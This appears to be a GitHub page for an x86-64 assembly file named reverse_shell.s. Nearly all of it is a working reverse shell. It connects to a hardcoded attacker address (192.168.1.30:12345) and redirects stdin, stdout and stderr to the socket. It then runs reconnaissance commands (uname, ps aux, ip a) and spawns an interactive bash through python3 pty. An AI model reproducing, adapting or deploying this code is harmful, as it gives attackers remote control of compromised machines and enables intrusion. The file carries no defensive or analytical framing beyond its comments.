-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathreverse_shell.s
More file actions
169 lines (141 loc) · 5.26 KB
/
reverse_shell.s
File metadata and controls
169 lines (141 loc) · 5.26 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
BITS 64
GLOBAL _start
; ------------------------------------------
; SECTION: Uninitialized Data (BSS)
; ------------------------------------------
SECTION .bss
struc sockaddr_in
sin_family resw 1
sin_port resw 1
sin_addr resd 1
endstruc
sock_fd resd 1
; ------------------------------------------
; SECTION: Read-Only Data (Constants)
; ------------------------------------------
SECTION .rodata
sh_cmd db "/usr/bin/python3", 0
arg1 db "-c", 0
arg2 db "import pty; pty.spawn('/bin/bash')", 0
info_cmd db "/bin/sh", 0
info_arg1 db "-c", 0
info_arg2 db "uname -a; uname -m; ps aux; ip a", 0
err_socket db "[-] Socket creation failed", 10, 0
err_connect db "[-] Connection failed", 10, 0
err_dup2 db "[-] dup2 failed", 10, 0
err_exec db "[-] execve failed", 10, 0
; ------------------------------------------
; SECTION: Network Configuration
; ------------------------------------------
init_struct:
istruc sockaddr_in
at sin_family, dw 2 ; AF_INET (IPv4)
at sin_port, dw 0x3930 ; Port 12345 (little-endian)
at sin_addr, dd 0x1E01A8C0 ; IP adress of the attacker : 192.168.1.30 (little-endian)
iend
; ------------------------------------------
; SECTION: Code (Main Execution)
; ------------------------------------------
SECTION .text
_start:
; Create a socket
mov rax, 41 ; syscall: socket
mov rdi, 2 ; domain: AF_INET (IPv4)
mov rsi, 1 ; type: SOCK_STREAM
mov rdx, 6 ; protocol: IPPROTO_TCP
syscall
test rax, rax ; Check if syscall failed
js handle_socket_error ; Jump if error (rax < 0)
mov [sock_fd], rax ; Save socket FD
connect_to_host:
; Connect to attacker machine
mov rax, 42 ; syscall: connect
mov rdi, [sock_fd] ; socket FD
mov rsi, init_struct ; sockaddr_in struct
mov rdx, 16 ; size of sockaddr_in
syscall
test rax, rax
js handle_connect_error
redirect_fds:
; Duplicate socket FD to stdin, stdout, and stderr
mov rsi, 0
.loop:
mov rax, 33 ; syscall: dup2
mov rdi, [sock_fd]
syscall
test rax, rax
js handle_dup2_error
inc rsi
cmp rsi, 3
jl .loop
execute_system_info:
; Fork a process
mov rax, 57 ; syscall: fork
syscall
test rax, rax
jnz execute_interactive_shell ; If parent, continue to shell
; Child process executes system info command
mov rax, 59 ; syscall: execve
mov rdi, info_cmd ; path: /bin/sh
lea rsi, [rel info_args] ; argv = {"/bin/sh", "-c", "uname -a; uname -m; ps aux; ip a", NULL}
xor rdx, rdx ; envp = NULL
syscall
jmp exit_program ; If exec fails, exit child
execute_interactive_shell:
; Execute Python3 to spawn a fully interactive Bash shell
mov rax, 59 ; syscall: execve
mov rdi, sh_cmd ; path: /usr/bin/python3
lea rsi, [rel args] ; argv = {"/usr/bin/python3", "-c", "import pty; pty.spawn('/bin/bash')", NULL}
xor rdx, rdx ; envp = NULL
syscall
test rax, rax
js handle_exec_error ; If execve fails, show error and exit
; ------------------------------------------
; ARGUMENT ARRAYS FOR EXECVE
; ------------------------------------------
args:
dq sh_cmd
dq arg1
dq arg2
dq 0
info_args:
dq info_cmd
dq info_arg1
dq info_arg2
dq 0
; ------------------------------------------
; ERROR HANDLING ROUTINES
; ------------------------------------------
handle_socket_error:
mov rdi, err_socket
call display_error_message
jmp exit_program
handle_connect_error:
mov rdi, err_connect
call display_error_message
jmp exit_program
handle_dup2_error:
mov rdi, err_dup2
call display_error_message
jmp exit_program
handle_exec_error:
mov rdi, err_exec
call display_error_message
jmp exit_program
; ------------------------------------------
; ERROR PRINTING FUNCTION
; ------------------------------------------
display_error_message:
mov rax, 1 ; syscall: write
mov rdi, 2 ; stderr
mov rsi, rdi ; error message
mov rdx, 30 ; max length to write
syscall
ret
; ------------------------------------------
; EXIT PROGRAM FUNCTION
; ------------------------------------------
exit_program:
mov rax, 60 ; syscall: exit
xor rdi, rdi ; exit(0)
syscall